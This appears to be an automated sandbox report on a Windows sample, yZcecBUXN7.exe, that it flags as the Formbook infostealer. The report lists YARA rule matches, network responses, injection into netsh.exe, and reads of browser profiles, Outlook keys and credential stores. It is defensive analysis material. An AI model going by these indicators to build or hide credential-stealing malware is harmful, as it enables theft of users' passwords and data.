            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 May 2024 06:25:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 
74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: openresty
            Date: Thu, 02 May 2024 06:25:25 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 48773
            Connection: close
            Accept-Ranges: bytes
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: openresty
            Date: Thu, 02 May 2024 06:25:28 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 48773
            Connection: close
            Accept-Ranges: bytes
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1163
            date: Thu, 02 May 2024 06:25:34 GMT
            server: LiteSpeed
            vary: User-Agent
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1163
            date: Thu, 02 May 2024 06:25:38 GMT
            server: LiteSpeed
            vary: User-Agent
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1163
            date: Thu, 02 May 2024 06:25:42 GMT
            server: LiteSpeed
            vary: User-Agent
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1163
            date: Thu, 02 May 2024 06:25:46 GMT
            server: LiteSpeed
            vary: User-Agent
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0
            x-runtime: 0.045185
            content-length: 18187
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0
            x-runtime: 0.029447
            content-length: 18207
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097
            x-runtime: 0.025147
            content-length: 28287
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 02 May 2024 06:26:05 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 02 May 2024 06:26:08 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 02 May 2024 06:26:11 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 02 May 2024 06:26:14 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html; charset=utf-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            x-powered-by: PHP/8.3.6
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Thu, 02 May 2024 06:26:36 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            x-powered-by: PHP/8.3.6
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Thu, 02 May 2024 06:26:38 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            x-powered-by: PHP/8.3.6
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
            transfer-encoding: chunked
            content-encoding: br
            vary: Accept-Encoding
            date: Thu, 02 May 2024 06:26:41 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 403 Forbidden
            content-length: 93
            cache-control: no-cache
            content-type: text/html
            connection: close
            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 02 May 2024 06:27:57 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 02 May 2024 06:28:01 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Thu, 02 May 2024 06:28:04 GMT
            Content-Type: text/html
            Content-Length: 548
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

            E-Banking Fraud

            Source: Yara match, File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects downloader injector, Author: ditekSHen
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837A464_2_03837A46
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FA494_2_0383FA49
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C5AA04_2_037C5AA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037899504_2_03789950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379B9504_2_0379B950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038159104_2_03815910
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037ED8004_2_037ED800
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037838E04_2_037838E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FFB14_2_0383FFB1
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FF094_2_0383FF09
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03781F924_2_03781F92
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03789EB04_2_03789EB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03783D404_2_03783D40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379FDC04_2_0379FDC0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03831D5A4_2_03831D5A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837D734_2_03837D73
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F9C324_2_037F9C32
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FCF24_2_0383FCF2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C111D04_2_00C111D0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C3904_2_00C0C390
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C5B04_2_00C0C5B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A62D4_2_00C0A62D
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A6304_2_00C0A630
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C12D304_2_00C12D30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C29D704_2_00C29D70
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01145130 appears 58 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 010FB970 appears 262 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01157E54 appears 107 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0117EA12 appears 86 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0118F290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037FF290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0376B970 appears 262 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037B5130 appears 58 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037EEA12 appears 86 times
            Source: yZcecBUXN7.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: yZcecBUXN7.exe, 00000000.00000002.1626357622.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626915170.0000000003A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000000.1623598827.00000000006D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000011FD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe Binary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPE
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPE
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPE
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPE
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPE
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPE
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: yZcecBUXN7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.log
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\netsh.exe File created: C:\Users\user\AppData\Local\Temp\1-00F23L
            Source: yZcecBUXN7.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4123105715.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.2195893631.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: yZcecBUXN7.exe ReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exe Virustotal: Detection: 37%
            Source: unknown Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: yZcecBUXN7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: yZcecBUXN7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
